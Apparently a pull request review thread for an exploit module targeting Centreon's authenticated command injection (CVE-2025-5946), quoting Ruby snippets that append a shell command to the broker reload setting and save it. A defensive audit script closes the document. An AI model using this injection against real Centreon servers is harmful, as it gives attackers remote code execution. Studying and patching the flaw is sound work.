Centreon authenticated command injection leading to RCE via broker engine "reload" parameter [CVE-2025-5946] #20672
Conversation
```ruby
# login at the Centreon web application
# return true if login successful else false
def centreon_login(name, pwd)
```
It'd be lovely to have this in a mixin, as there are already 3 modules targeting Centreon.
I'd agree here, I think we have an unwritten rule that if 3 modules are doing something similar it should be a mixin.
```ruby
# get the Centreon version
# return version if successful else nil
def get_centreon_version
```
This would also be great to have in a mixin <3
Hello @h00die-gr3y,
Thanks for your module, I've left a review and I will set up the target to test the exploit.
```ruby
# CVE-2025-5946: Command Injection leading to RCE via the centreon broker engine "reload" parameter triggered by a poller reload
def execute_payload(cmd, _opts = {})
  @clean_payload = true
  payload = ";#{cmd}"
```
Would `;` be considered a badchar also?
No, I would not consider this as a badchar, because it will not have any effect on the execution of the payload generated.
```ruby
  'name' => 'Central',
  'ns_ip_address' => '127.0.0.1',
  'localhost[localhost]' => 1,
  'is_default[is_default]' => 1,
  'gorgone_communication_type[gorgone_communication_type]' => 1,
  'gorgone_port' => 5556,
  'engine_start_command' => 'service centengine start',
  'engine_stop_command' => 'service centengine stop',
  'engine_restart_command' => 'service centengine restart',
  'engine_reload_command' => 'service centengine reload',
  'nagios_bin' => '/usr/sbin/centengine',
  'nagiostats_bin' => '/usr/sbin/centenginestats',
  'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
  'broker_reload_command' => "service cbd reload#{payload}",
  'centreonbroker_cfg_path' => '/etc/centreon-broker',
  'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
  'centreonbroker_logs_path' => nil,
  'centreonconnector_path' => '/usr/lib64/centreon-connector',
  'init_script_centreontrapd' => 'centreontrapd',
  'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
  'ns_activate[ns_activate]' => 1,
  'submitC' => 'Save',
  'id' => 1,
  'o' => 'c',
  'centreon_token' => centreon_token.to_s
```
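Review bot: the injected command is persisted, not just executed once: `'broker_reload_command' => "service cbd reload#{payload}"` is submitted with `'submitC' => 'Save'`, so it stays in the stored poller configuration until the `@clean_payload` path restores it. Please make sure cleanup writes the original `service cbd reload` value back (and note this in the module docs), since a failed session otherwise leaves the target's poller config carrying the payload.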
Is this information static? Meaning, let's assume I use the application and I may have a different gorgone_port; this payload will overwrite everything with this data, right? Can this be avoided? Or should we maybe add it to the side effects?
You are right, but it is a bit of a hassle to pull all these values from the HTML response. It is not nice JSON or XML format. I'd rather leave it like it is, because the majority of the installations are using these defaults.
OK, sounds reasonable. Would you mind adding CONFIG_CHANGE to SideEffects to play it safe?
Centreon is a platform designed to monitor your cloud and on-premises infrastructure.
This module exploits a command injection vulnerability using the broker engine reload setting on the poller configuration page of the Centreon web application. Injecting a malicious payload into the broker engine reload parameter and restarting the poller triggers this vulnerability. You need admin access to the Centreon Web application in order to execute this RCE.
This issue affects all Centreon editions >= 19.10.0 and it is fixed in Centreon Web versions 24.10.13, 24.04.18 and 23.10.28.
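From the defender's side, the persisted `broker_reload_command` (and the other poller command fields the form above posts) is where an injection like this lands and can be spotted. The following audit is an added example, not code from the PR or from Centreon: it checks those fields against a strict command pattern, reports the stock defaults listed in the module's form data as the baseline, and runs on a constructed sample configuration with one tampered value.

```ruby
# Added example (not from the PR or Centreon): audit the poller command
# settings that Centreon passes to a shell and flag values that carry
# shell metacharacters. Key names match the form fields posted by the
# module; the sample values below are constructed.

COMMAND_KEYS = %w[
  engine_start_command engine_stop_command engine_restart_command
  engine_reload_command broker_reload_command nagios_bin nagiostats_bin
].freeze

# Stock values, as sent by the module's form data.
EXPECTED_DEFAULTS = {
  'engine_start_command' => 'service centengine start',
  'engine_stop_command' => 'service centengine stop',
  'engine_restart_command' => 'service centengine restart',
  'engine_reload_command' => 'service centengine reload',
  'broker_reload_command' => 'service cbd reload',
  'nagios_bin' => '/usr/sbin/centengine',
  'nagiostats_bin' => '/usr/sbin/centenginestats'
}.freeze

# A legitimate command is a program path plus plain arguments; anything
# else (;, &, |, backticks, $(), redirects, newlines) is rejected.
SAFE_COMMAND = %r{\A[A-Za-z0-9_./ -]+\z}

def safe_command?(value)
  value.is_a?(String) && !value.empty? && value.match?(SAFE_COMMAND)
end

# One finding per suspicious key: :missing, :shell_metacharacters or
# :non_default (a clean but customised value worth a second look).
def audit_poller_config(config)
  COMMAND_KEYS.each_with_object([]) do |key, findings|
    value = config[key]
    if value.nil?
      findings << { key: key, issue: :missing, value: nil }
    elsif !safe_command?(value)
      findings << { key: key, issue: :shell_metacharacters, value: value }
    elsif EXPECTED_DEFAULTS[key] != value
      findings << { key: key, issue: :non_default, value: value }
    end
  end
end

# Constructed sample: a stock poller config with one tampered field.
SAMPLE_CONFIG = EXPECTED_DEFAULTS.merge(
  'broker_reload_command' => 'service cbd reload;echo injected'
).freeze

audit_poller_config(SAMPLE_CONFIG).each { |f| puts "#{f[:key]}: #{f[:issue]}" }
```

The same check can be pointed at the values exported from the Centreon database or scraped from the poller configuration page, which is the reviewer's concern above: a poller whose command fields no longer match the defaults deserves a look even when no metacharacters are present.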